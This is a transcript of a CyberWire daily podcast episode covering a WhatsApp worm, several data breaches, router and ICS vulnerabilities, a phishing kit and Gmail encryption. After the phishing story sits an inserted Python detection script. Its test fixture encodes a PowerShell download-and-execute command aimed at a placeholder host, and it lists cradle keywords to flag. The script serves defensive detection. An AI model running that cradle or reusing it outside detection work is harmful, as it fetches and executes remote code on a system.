The CyberWire Daily Podcast 10.3.25
Ep 2406 | 10.3.25

WhatsApp worm spreads.

Transcript

A fast-spreading malware campaign is abusing WhatsApp as both lure and launchpad. Carmaker Renault suffers a data breach. DrayTek patches a critical router flaw. CISA alerts cover a range of vulnerabilities. A new phishing kit lowers the bar for convincing lures. A Catholic hospital network pays $7.6 million to settle data breach litigation. A major breach at FEMA exposes employee data. Google expands Gmail’s end-to-end encryption (E2EE) capabilities. On our Industry Voices segment, we are joined by Brian Vecci, Field CTO at Varonis, discussing “Move fast but don’t break things: Innovating at light speed without putting data at risk.” The UK’s digital ID is a solution in search of a mandate.

Today is Friday October 3rd 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

A fast-spreading malware campaign is abusing WhatsApp as both lure and launchpad. 

A fast-spreading malware campaign is abusing WhatsApp as both lure and launchpad. First seen in September 2025 in Brazil, the self-propagating malware known as SORVEPOTEL spreads through phishing messages with malicious ZIP files disguised as receipts or budgets. Once opened, a hidden Windows shortcut triggers encoded PowerShell commands that fetch additional payloads, establish persistence, and connect to attacker-controlled domains. The malware then hijacks active WhatsApp Web sessions, replicating itself automatically to all contacts and groups, rapidly multiplying infections and sometimes leading to account bans. Analysts note that attackers also distribute similar ZIPs via phishing emails appearing to come from trusted institutions. The campaign highlights growing risks from messaging platforms used in enterprise environments, where social engineering can amplify disruption.

Carmaker Renault suffers a data breach. 

The personal data of Renault and Dacia customers in the UK has been compromised after a cyber attack on a third-party data processor used by the carmaker. Renault confirmed the breach in emails to affected drivers, noting that while no financial or password information was exposed, attackers accessed sensitive personal details including names, addresses, birth dates, gender, phone numbers, and vehicle registration data. The company has not disclosed the total number of customers impacted but stressed that its own systems were not directly compromised. Renault says it is contacting those affected and urging caution against unsolicited requests for information. The incident adds to a growing list of major automotive cyber breaches, as Jaguar Land Rover also contends with a separate disruptive attack.

DrayTek patches a critical router flaw. 

DrayTek has released patches for CVE-2025-10547, a critical remote code execution flaw in DrayOS routers. The bug, reported by researcher Pierre-Yves Maes, can be triggered via crafted HTTP or HTTPS requests to the web interface, potentially leading to memory corruption, crashes, or remote code execution. While WAN attacks are blocked if remote WebUI and VPN services are disabled or ACLs configured, local exploitation remains possible. Firmware updates for 35 Vigor models are available, with no evidence yet of active exploitation.

CISA alerts cover a range of vulnerabilities. 

CISA has added a Meteobridge vulnerability, tracked as CVE-2025-4008, to its Known Exploited Vulnerabilities catalog after confirming active attacks. Meteobridge devices connect local weather stations to public networks and are managed through a web interface. The flaw, scored 8.7, stems from unsanitized user input in a CGI script exposed without authentication, allowing command injection and remote code execution. Researchers at Onekey warned in May that exploitation could occur via simple GET requests, with a proof-of-concept publicly available. Roughly 100 devices remain exposed online due to misconfiguration, despite Smartbedded releasing a patch in version 6.2 months earlier. CISA now requires federal agencies to remediate within three weeks under Binding Operational Directive 22-01. The agency has not disclosed the scope of observed exploitation.

Meanwhile, CISA has issued two new ICS advisories covering Raise3D Pro2 Series 3D printers and Hitachi Energy MSM products. The Raise3D flaw, CVE-2025-10653, is an authentication bypass through an unauthenticated debug port, potentially enabling file system access and data exfiltration. Raise3D advises disabling developer mode until a firmware patch is released. Hitachi Energy MSM devices face XSS and assertion vulnerabilities, risking injection or crashes. CISA urges organizations to apply mitigations, restrict internet exposure, and follow defense-in-depth practices.

A new phishing kit lowers the bar for convincing lures. 

A newly advertised phishing kit called Impact Solutions is lowering the bar for cybercrime by giving attackers a point-and-click way to build convincing lures. First observed in September 2025, the tool provides ready-made templates for malware delivery through LNK shortcuts, SVG files, and HTML attachments. It also includes evasive features such as file type masking, UAC bypass techniques, and anti-sandbox checks. With a few clicks, even low-skilled actors can disguise malicious files as PDFs, videos, or invoices and distribute them in phishing campaigns. Impact Solutions also offers modules like fake login pages and a “ClickFix” feature that tricks users into running Base64-encoded PowerShell commands. Abnormal AI warns that commercialized kits like this expand social engineering risks and recommends behavior-based detection tools.
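Both the SORVEPOTEL story above (a shortcut that launches encoded PowerShell to fetch further payloads) and the Impact Solutions “ClickFix” module (Base64-encoded PowerShell commands) share one detectable trait. The following is an added defender-side example, not code from the page or from the researchers cited: it decodes a `-EncodedCommand` argument from a process-creation record and scores the event on the traits the stories describe. The event records, the parent/child fields and the staging URL are constructed for the example.

```python
import base64
import re

# Constructed payload for the fixture only (not an indicator from the page).
# PowerShell's -EncodedCommand takes Base64 of UTF-16LE text.
_DEMO_CMD = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
_DEMO_B64 = base64.b64encode(_DEMO_CMD.encode("utf-16le")).decode()

# Constructed process-creation events in a generic EDR/Sysmon-like shape.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "cmd": f"powershell.exe -nop -w hidden -enc {_DEMO_B64}"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmd": r"notepad.exe C:\Users\alice\Downloads\recibo.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmd": 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Get-Date"'},
]

# -e, -ec, -enc, -EncodedCommand: PowerShell accepts any unambiguous prefix.
_ENC_ARG = re.compile(r"(?i)(?:^|\s)-e\w*\s+([A-Za-z0-9+/=]{16,})")
# Download-and-execute cradle fragments typical of a staged loader.
_CRADLE = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "iex",
           "invoke-expression", "net.webclient", "start-bitstransfer", "http")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Score one process-creation event; a finding needs at least two traits."""
    cmd = event["cmd"]
    if "powershell" not in cmd.lower():
        return None
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        hits = [k for k in _CRADLE if k in decoded.lower()]
        if hits:
            reasons.append("download cradle: " + ", ".join(hits))
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd):
        reasons.append("hidden window")
    # A shortcut double-clicked out of a ZIP is spawned by explorer.exe, not a shell.
    if event["parent"].lower().endswith(r"\explorer.exe"):
        reasons.append("spawned by explorer.exe")
    return {"cmd": cmd, "decoded": decoded, "reasons": reasons} if len(reasons) >= 2 else None

def triage(events):
    return [f for f in (analyze_event(e) for e in events) if f]
```

The third sample event shows why the decoder validates its input: `-ExecutionPolicy Bypass` also begins with `-e` but carries no Base64 payload, so it is not flagged.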

A Catholic hospital network pays $7.6 million to settle data breach litigation. 

Hospital Sisters Health System (HSHS), a Catholic hospital network in the Midwest, will pay $7.6 million and strengthen data security to settle litigation over its 2023 breach affecting nearly 900,000 people. The attack exposed sensitive personal and health information. Under the settlement, class members can claim up to $5,000 for documented losses or opt for smaller pro-rated payments. HSHS denies wrongdoing but agreed to implement security improvements. Legal experts say settlements like this highlight mounting pressure on healthcare providers to bolster cybersecurity.

A major breach at FEMA exposes employee data. 

A major breach at FEMA exposed employee data from both FEMA and U.S. Customs and Border Protection, Nextgov/FCW reports. Hackers exploited compromised credentials and the CitrixBleed 2.0 flaw beginning June 22, exfiltrating data from Region 6 servers covering five states and nearly 70 tribal nations. DHS cited FEMA’s failure to enforce multi-factor authentication and patch critical vulnerabilities, dismissing its IT staff in August. FEMA has since restructured leadership, naming acting CIO Diego Lapiduz and implementing stronger security controls.

Google expands Gmail’s end-to-end encryption (E2EE) capabilities. 

Google is expanding Gmail’s end-to-end encryption (E2EE) capabilities, allowing enterprise users to send encrypted emails to recipients on any platform. Users can enable “Additional encryption” when composing a message, ensuring seamless decryption for Google Workspace subscribers. Non-Gmail recipients instead receive a secure link to view and reply through a guest Workspace account, removing the need for key exchanges or third-party tools. The feature, rolling out over the next two weeks to Enterprise Plus customers with Assured Controls, is powered by client-side encryption (CSE), which keeps encryption keys outside Google’s servers. This design helps organizations meet regulatory requirements for data sovereignty, HIPAA compliance, and export controls by ensuring that even Google cannot access message contents. Google first piloted the approach in 2022 across Workspace services.

The UK’s digital ID is a solution in search of a mandate. 

The UK government has finally put flesh on the bones of its digital ID plan, perhaps hoping to reassure the 2.76 million citizens who’ve already signed a petition demanding it be scrapped. Prime Minister Keir Starmer, who somehow forgot to mention the idea during his election campaign, now says the digital credential will streamline bureaucracy and make right-to-work checks easier. Palantir, often accused of being too cozy with government, has declined to bid—citing its policy of only supporting initiatives with an electoral mandate. The move echoes Estonia’s efficiency drive but arrives under the shadow of Big Brother Watch, which warns of creeping state surveillance. Officials insist it won’t be compulsory, police can’t demand it, and privacy will be respected. Still, skeptics say Starmer must explain why Britons should trust yet another government IT scheme—or risk watching his flagship digital ID wither before it even launches.

Whether it becomes a passport to convenience or just another card nobody asked for, the fate of Britain’s digital ID may hinge less on technology and more on trust.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

One quick note before we wrap up: I’ve been nominated for the SANS Difference Maker Award in the Media Creator of the Year category. I’m honored to be recognized and would appreciate your support. You’ll find the link to vote in our show notes, and voting is open until Wednesday, October 8th at 11:59 p.m. Eastern. Thanks for listening, and for being part of the N2K CyberWire community. 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry. Learn how at n2k.com.

N2K’s senior producer is Alice Carruth. Our producer is Liz Stokes. We’re mixed by Elliott Peltzman and Tré Hester, with original music by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.